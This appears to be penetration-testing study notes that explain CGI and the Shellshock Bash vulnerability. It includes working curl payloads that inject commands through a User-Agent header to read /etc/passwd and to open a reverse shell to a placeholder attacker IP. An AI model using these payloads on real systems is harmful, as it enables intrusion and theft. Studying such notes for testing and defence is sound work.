CGI Applications
Introduction
A Common Gateway Interface (CGI) is used to help a web server render dynamic pages and create a customized response for the user making a request via a web application.
CGI applications are primarily used to access other applications running on a web server.
CGI is essentially middleware between web servers, external databases, and information sources.
CGI scripts and programs are kept in the
/CGI-bindirectory on a web serverTypically written in C, C++, Java, PERL, etc
CGI scripts run in the security context of the web server
CGI Applications - Shellshock [CVE-2014-6271]
The most well-known CGI attack is exploiting the Shellshock (aka, "Bash bug") vulnerability via CGI.
Resource: https://nvd.nist.gov/vuln/detail/CVE-2014-6271
Affected Versions:
GNU Bash up until version 4.3Description: Shellshock is a security flaw in the Bash shell that allows an attacker to
execute operating system commands that are included after a function stored inside an environment variable.PoC Example:
env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"
Nothing will happen when the environment variable is assigned a value
If the target is vulnerable, whenever the environment variable is imported, the command
echo vulnerable-shellshockwill be executedIf the target is NOT vulnerable, then the command
echo not vulnerablewill be executed
Shellshock PoC to read any file:
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://target.com/cgi-bin/access.cgi
Shellshock PoC to gain a Reverse Shell:
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/your-ip/your-nc-port 0>&1' http://target.com/cgi-bin/access.cgi
Last updated